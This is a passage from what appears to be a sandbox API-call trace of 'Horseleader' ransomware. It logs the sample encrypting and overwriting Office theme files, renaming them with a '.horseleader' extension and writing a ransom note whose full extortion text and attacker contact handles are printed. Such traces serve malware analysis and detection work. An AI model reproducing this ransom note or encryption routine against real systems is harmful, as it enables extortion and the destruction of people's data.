ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8573, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.861] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.861] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 78 [0247.861] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.861] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.862] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.862] lstrlenW (lpString=".testttjffg") returned 11 [0247.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.862] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.862] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 78 [0247.863] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.863] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=34163) returned 1 [0247.863] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.870] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.870] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.871] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3573, lpOverlapped=0x0) returned 1 [0247.871] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffca8d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.871] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3573, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3573, lpOverlapped=0x0) returned 1 [0247.872] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.872] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.872] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.872] CloseHandle (hObject=0x1a4) returned 1 [0247.873] GetProcessHeap () returned 0x780000 [0247.873] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.873] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.horseleader") returned 90 [0247.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.horseleader")) returned 1 [0247.874] GetProcessHeap () returned 0x780000 [0247.874] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.874] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8573, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.874] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.874] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\#Decrypt#.txt") returned 79 [0247.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.875] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.875] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.877] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.877] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.877] CloseHandle (hObject=0x158) returned 1 [0247.878] GetProcessHeap () returned 0x780000 [0247.878] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.878] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SKY", cAlternateFileName="")) returned 1 [0247.878] lstrcmpiW (lpString1="SKY", lpString2="Windows") returned -1 [0247.878] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned 63 [0247.878] lstrcmpW (lpString1="SKY", lpString2=".") returned 1 [0247.878] lstrcmpW (lpString1="SKY", lpString2="..") returned 1 [0247.878] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.878] GetProcessHeap () returned 0x780000 [0247.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.879] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*") returned 65 [0247.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.881] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\.") returned 65 [0247.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.881] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.881] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\..") returned 66 [0247.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.882] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.882] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.882] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 75 [0247.882] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.882] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.882] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.882] lstrlenW (lpString=".testttjffg") returned 11 [0247.882] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.882] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 75 [0247.884] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.884] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=937) returned 1 [0247.884] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3a9, lpOverlapped=0x0) returned 1 [0247.896] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.896] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3a9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3a9, lpOverlapped=0x0) returned 1 [0247.897] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.897] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.897] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.897] CloseHandle (hObject=0x1a4) returned 1 [0247.898] GetProcessHeap () returned 0x780000 [0247.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.898] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.horseleader") returned 87 [0247.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.horseleader")) returned 1 [0247.899] GetProcessHeap () returned 0x780000 [0247.899] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f0ff00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x25f0ff00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1413d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SKY.ELM", cAlternateFileName="")) returned 1 [0247.899] lstrcmpiW (lpString1="SKY.ELM", lpString2="Windows") returned -1 [0247.899] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0247.899] StrStrIW (lpFirst="SKY.ELM", lpSrch=".horseleader") returned 0x0 [0247.899] lstrcmpW (lpString1="SKY.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.900] lstrcmpW (lpString1="SKY.ELM", lpString2="_uninstalling_.png") returned 1 [0247.900] lstrlenW (lpString=".testttjffg") returned 11 [0247.900] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM", lpSrch=".testttjffg") returned 0x0 [0247.900] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.900] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.901] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0247.901] StrStrW (lpFirst="SKY.ELM", lpSrch=".txt") returned 0x0 [0247.902] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=82237) returned 1 [0247.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.905] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.906] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.906] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x789e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.906] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.907] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.907] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.907] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xf13d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.907] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.907] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.908] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.908] CloseHandle (hObject=0x1a4) returned 1 [0247.908] GetProcessHeap () returned 0x780000 [0247.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.908] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM.horseleader") returned 83 [0247.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm.horseleader")) returned 1 [0247.910] GetProcessHeap () returned 0x780000 [0247.910] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.910] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SKY.INF", cAlternateFileName="")) returned 1 [0247.910] lstrcmpiW (lpString1="SKY.INF", lpString2="Windows") returned 